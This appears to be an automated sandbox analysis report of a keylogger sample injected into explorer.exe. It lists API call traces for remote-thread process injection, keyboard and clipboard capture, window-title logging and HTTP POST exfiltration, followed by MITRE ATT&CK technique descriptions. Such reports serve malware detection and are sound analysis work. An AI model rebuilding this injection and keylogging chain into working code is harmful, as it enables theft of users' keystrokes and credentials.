Instruction Fuzzy Hash: 7CA002B26546006BDD4C97E4AD4DF157658AB45702F0045447246C50509D7555458761

Non-executed Functions

Function 00A318BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A32724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,00A329F3,-00000001,00A3128C), ref: 00A32731

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 00A318F4
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00A3192F
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00A319BF
RtlMoveMemory.NTDLL(00000000,00A33638,00000016), ref: 00A319E6
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00A31A0E
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00A31A1E
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A31A38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00A31A40
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31A4E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31A55
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00A31A6B
GetProcAddress.KERNEL32(00000000), ref: 00A31A72
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00A31A88
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00A31AB2
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A31AC5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31ACC
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31AD3
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00A31AE7
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00A31AFE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31B0B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31B11
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00A31B17
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A31B1A

Strings

atan, xrefs: 00A31A61
opera_shared_counter, xrefs: 00A31A31
ntdll, xrefs: 00A31A66

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$ntdll$opera_shared_counter
API String ID: 1066286714-2737717697
Opcode ID: 694bface864641738dd601d964ce44847f923ea4567cd6fa49b1a13ee586c4c7
Instruction ID: 9efe10f6c50c2d5ade56c36f9289ceb58970c11df9dd8ac3040289aa306b2da8
Opcode Fuzzy Hash: 694bface864641738dd601d964ce44847f923ea4567cd6fa49b1a13ee586c4c7
Instruction Fuzzy Hash: B261BC72608304AFDB14DFA4DD84E6BBBECEB89754F000529F949D3291DB74DE058BA2

Function 00A32799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00A327B5
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00A327CD
lstrlen.KERNEL32(?,00000000), ref: 00A327D5
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00A327E0
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00A327FA
wsprintfA.USER32 ref: 00A32811
CryptDestroyHash.ADVAPI32(?), ref: 00A3282A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A32834

Strings

%02X, xrefs: 00A3280B

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 9ce257f51e35fa85cd507eba8e89f93337d802ced48e3be338224a98031249d2
Instruction ID: ab817797e2f672bcb18135601f9d3f3b05373753d5d8e369f60a12dd1cc998f5
Opcode Fuzzy Hash: 9ce257f51e35fa85cd507eba8e89f93337d802ced48e3be338224a98031249d2
Instruction Fuzzy Hash: 351116B2904108BFEB21DBD5ED88EEEBBBCEB49311F104065FA05E2160D6754F569B60

Function 00A3162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A31652
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 00A3167A

Strings

, xrefs: 00A31699

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: KeyboardStateUnicode
String ID:
API String ID: 3453085656-3916222277
Opcode ID: 425a6dbc9ca9c0e55ca362db9ec8f64889585357d62fbf50e73a69c8f0a7b3a0
Instruction ID: 1b15b8ef61af405e134bbfed3c74627e1c7442709a7af647bd57c7a27dfc860b
Opcode Fuzzy Hash: 425a6dbc9ca9c0e55ca362db9ec8f64889585357d62fbf50e73a69c8f0a7b3a0
Instruction Fuzzy Hash: 300180729006199BDF34CB95DD47BFBB3BCAF45B00F08441AF901E2151D734E9459AA1

Function 00A313AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(00A35013,0000001C), ref: 00A313C8
VirtualQuery.KERNEL32(00A313AE,?,0000001C), ref: 00A313DA
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00A3140B
GetCurrentProcessId.KERNEL32(00000004), ref: 00A3141C
wsprintfA.USER32 ref: 00A31433
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00A31448
GetLastError.KERNEL32 ref: 00A3144E
RtlInitializeCriticalSection.NTDLL(00A3582C), ref: 00A31465
Sleep.KERNEL32(000001F4), ref: 00A31489
GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 00A314A6
GetProcAddress.KERNEL32(00000000), ref: 00A314AF
GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 00A314D0
GetProcAddress.KERNEL32(00000000), ref: 00A314D3
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00A314F1
CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 00A3150D
CloseHandle.KERNEL32(00000000), ref: 00A31514
RtlExitUserThread.NTDLL(00000000), ref: 00A3152A

Strings

TranslateMessage, xrefs: 00A3149C
%s%d%d%d, xrefs: 00A3142D
user32.dll, xrefs: 00A314A1, 00A314CB
kernel32.dll, xrefs: 00A314EC
GetClipboardData, xrefs: 00A314C6

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
API String ID: 3628807430-1779906909
Opcode ID: cf05a8f4c4459f0d1b011c66ab411a5dceddcb37f96d97e550663592824a6f4c
Instruction ID: 5877342a73c9e8e8b3da3664e2b1e49437c1802a2708712f5b7382aff9814bd8
Opcode Fuzzy Hash: cf05a8f4c4459f0d1b011c66ab411a5dceddcb37f96d97e550663592824a6f4c
Instruction Fuzzy Hash: 0641C171A04304BFDB14EBF9ED0AE6A7BACFB86751F004419F50687251CB76DA028BA0

Function 00A316B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(00A3582C), ref: 00A316C4
lstrlenW.KERNEL32 ref: 00A316DB
lstrlenW.KERNEL32 ref: 00A316F3
wsprintfW.USER32 ref: 00A31743
GetForegroundWindow.USER32 ref: 00A3174E
GetWindowTextW.USER32(00000000,00A35850,00000800), ref: 00A31767
GetClassNameW.USER32(00000000,00A35850,00000800), ref: 00A31774
lstrcmpW.KERNEL32(00A35020,00A35850), ref: 00A31781
lstrcpyW.KERNEL32(00A35020,00A35850), ref: 00A3178D
wsprintfW.USER32 ref: 00A317AD
lstrcatW.KERNEL32 ref: 00A317C6
RtlLeaveCriticalSection.NTDLL(00A3582C), ref: 00A317D3

Strings

New Window Caption -> , xrefs: 00A3179A
%s%s%s%s, xrefs: 00A317A2
Clipboard -> , xrefs: 00A31730
%s%s%s, xrefs: 00A31738

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
API String ID: 2651329914-3371406555
Opcode ID: 171b2d018834b5fe98079ecaa057bb704dd845f92e59305381d89a590d827004
Instruction ID: a731afc3ff68923962d77cbcfd361aa6a3a393c19996f2bf1697e1197a8f1f4b
Opcode Fuzzy Hash: 171b2d018834b5fe98079ecaa057bb704dd845f92e59305381d89a590d827004
Instruction Fuzzy Hash: 8321C936E04614BFDB25ABB9FD89E2F3F68FB42B55F084424F40192161DB168E039BB5

Function 00A325F1 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00A32603
GetCurrentThreadId.KERNEL32 ref: 00A3260B
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00A3261B
Thread32First.KERNEL32(00000000,0000001C), ref: 00A32629
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00A32648
SuspendThread.KERNEL32(00000000), ref: 00A32658
CloseHandle.KERNEL32(00000000), ref: 00A32667
Thread32Next.KERNEL32(00000000,0000001C), ref: 00A32677
CloseHandle.KERNEL32(00000000), ref: 00A32682

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 9c6f7c85dcfe515bec4937543dfdece2a9f4dae248fbdda46fa9b6d7ef03c15e
Instruction ID: af3d5cc725e3ea5d6a26b380ee9a8f3ba40a2bc69890fe8cfb03977bb5fc56cd
Opcode Fuzzy Hash: 9c6f7c85dcfe515bec4937543dfdece2a9f4dae248fbdda46fa9b6d7ef03c15e
Instruction Fuzzy Hash: 88115272409200EFDB15DFA0AD4DB6EBFB4EF46B11F040469FA4692150D7348A4A8BA7

Function 00A320A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13

Part of subcall function 00A3298A: lstrlen.KERNEL32(00A34FE2,?,00000000,00000000,00A320DD,74DE8A60,00A34FE2,00000000), ref: 00A32992
Part of subcall function 00A3298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00A34FE2,00000001,00000000,00000000), ref: 00A329A4

Part of subcall function 00A324CC: RtlZeroMemory.NTDLL(?,00000018), ref: 00A324DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 00A32139
wsprintfW.USER32 ref: 00A32272
wsprintfW.USER32 ref: 00A322DD
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00A323A7

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 00A32301
Host: %s, xrefs: 00A322D7
Accept: */*Referer: %S, xrefs: 00A32268
POST, xrefs: 00A32223

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 9596f31e201dca1a39c9e640bb1a3ec281874a8e21116124bb836a10a544fc8d
Instruction ID: 08ea0f9524fcdc0867b6c73377d3dcfcf738d66a11811432abbb976dad8511ad
Opcode Fuzzy Hash: 9596f31e201dca1a39c9e640bb1a3ec281874a8e21116124bb836a10a544fc8d
Instruction Fuzzy Hash: C8A16971609344AFDB10DFA8DD85B6BBBE8EF88740F00092DF985C7251DA74DA058B52

Function 00A312AE Relevance: 7.6, APIs: 5, Instructions: 93
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A329BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,00A312D9,00000000,00000000,?,00000001), ref: 00A329C7

lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 00A312DC

Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13

PathMatchSpecA.SHLWAPI(?,00000000), ref: 00A3138A

Part of subcall function 00A32841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00A31119,00000001), ref: 00A32850
Part of subcall function 00A32841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00A31119,00000001), ref: 00A32855

RtlZeroMemory.NTDLL(00000000,00000104), ref: 00A31316
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00A31332

Part of subcall function 00A32569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00A3136E), ref: 00A32591
Part of subcall function 00A32569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 00A3259A

RtlMoveMemory.NTDLL(00000000,?,?), ref: 00A3135F

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
String ID:
API String ID: 2993730741-0
Opcode ID: 1eaac29aa3249e86b1ebbbe2db386e5fe19f1f8be88fd4c936db8603869f351a
Instruction ID: bd11a3d679c108d47adcd52470141a9320949e67ce78dd95a3f2806e9c8ea787
Opcode Fuzzy Hash: 1eaac29aa3249e86b1ebbbe2db386e5fe19f1f8be88fd4c936db8603869f351a
Instruction Fuzzy Hash: D2219F71B082019F8744EF689995A7FB7DAAB84700F10053EFC56D7741DB34DD0A8BA2

Function 00A31581 Relevance: 7.6, APIs: 5, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalLock.KERNEL32(00000000), ref: 00A315A9
lstrlenW.KERNEL32(00000000), ref: 00A315C6
lstrcatW.KERNEL32(00000000,00000000), ref: 00A315DC
lstrlenW.KERNEL32(00000000), ref: 00A31600
GlobalUnlock.KERNEL32(00000000), ref: 00A3161C

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: Globallstrlen$LockUnlocklstrcat
String ID:
API String ID: 1114890469-0
Opcode ID: 9218e5bfb1d459478291c598519838cc7ed2026a1bc22df67c98d23357822838
Instruction ID: b0b7e83769a51bb7b71dee6631351e2566d5716cfb21129c56c2bd621c2ea879
Opcode Fuzzy Hash: 9218e5bfb1d459478291c598519838cc7ed2026a1bc22df67c98d23357822838
Instruction Fuzzy Hash: A7019633A041115B9A29A7F96D9A6BEB2AE9FD6711F08403AF80793211DF298D034790

Function 00A31BBD Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00A31BF4
LoadLibraryA.KERNEL32(?,00A35848,00000000,00000000,74DF2EE0,00000000,00A319B6,?,?,?,00000001,?,00000000), ref: 00A31C1C
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00A31C49
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00A31C9A

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 12ea088edd44dc9eb5037b220de9201965e4dc6f53d50bafdc1e366d585f9081
Instruction ID: 47741dbc5f22f95ea9c58586f4142d60f834606b97270c5348a48209e13979f6
Opcode Fuzzy Hash: 12ea088edd44dc9eb5037b220de9201965e4dc6f53d50bafdc1e366d585f9081
Instruction Fuzzy Hash: 8C316E72744616ABCB18CF2ACCC4B66B7A8FF15315F18952DF846C7600D735E846CBA0

Function 00A3182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00A3582C), ref: 00A31839
lstrlenW.KERNEL32 ref: 00A31845
RtlLeaveCriticalSection.NTDLL(00A3582C), ref: 00A318A9
Sleep.KERNEL32(00007530), ref: 00A318B4

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleeplstrlen
String ID:
API String ID: 2134730579-0
Opcode ID: 4a3260ac7b994b99ce0325743e4322bb9b5b9329cf0c2f75765644371468818e
Instruction ID: 3552300e3e558e74453f273c06428e60eaed3683ef0e28897fac7eba86a4b227
Opcode Fuzzy Hash: 4a3260ac7b994b99ce0325743e4322bb9b5b9329cf0c2f75765644371468818e
Instruction Fuzzy Hash: 6701D631D15500AFD72CE7F9EE5AA7E3AA9EB42700B000028F0018B261DF35CE02DBA2

Function 00A326C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,00A311DD), ref: 00A326DB
IsWow64Process.KERNEL32(000000FF,?), ref: 00A326ED
IsWow64Process.KERNEL32(00000000,?), ref: 00A32700
CloseHandle.KERNEL32(00000000), ref: 00A32716

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: dbb59967d7078b37f0faa9a1c7abe99ff5806c938f07bbeb569a06592a7686cc
Instruction ID: 051044369dcfc18d0fd2ef3ced70dc46ed572bbc0c27f31db4f07161a6ba16d7
Opcode Fuzzy Hash: dbb59967d7078b37f0faa9a1c7abe99ff5806c938f07bbeb569a06592a7686cc
Instruction Fuzzy Hash: 01F09072806218FF9B14CFE09D489BEB7BCEE06251F10026AF90093240E7305F0197A0

Function 00A317DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13

GetLocalTime.KERNEL32(?,00000000), ref: 00A317F3
wsprintfW.USER32 ref: 00A3181D

Strings

[%02d.%02d.%d %02d:%02d:%02d], xrefs: 00A31817

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: [%02d.%02d.%d %02d:%02d:%02d]
API String ID: 377395780-613334611
Opcode ID: a65bd527413f8d063ebff0450bda2396367775b1779a6d6f3143669852cb3167
Instruction ID: 923d275845684fb09184fd0429a8e04d62e763495f7fd592a233e42b2dd4b807
Opcode Fuzzy Hash: a65bd527413f8d063ebff0450bda2396367775b1779a6d6f3143669852cb3167
Instruction Fuzzy Hash: E1F03772904128BACB1497D99D059FFB2FCEB0C702F00015AFA41D1180E6785A90D3B5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
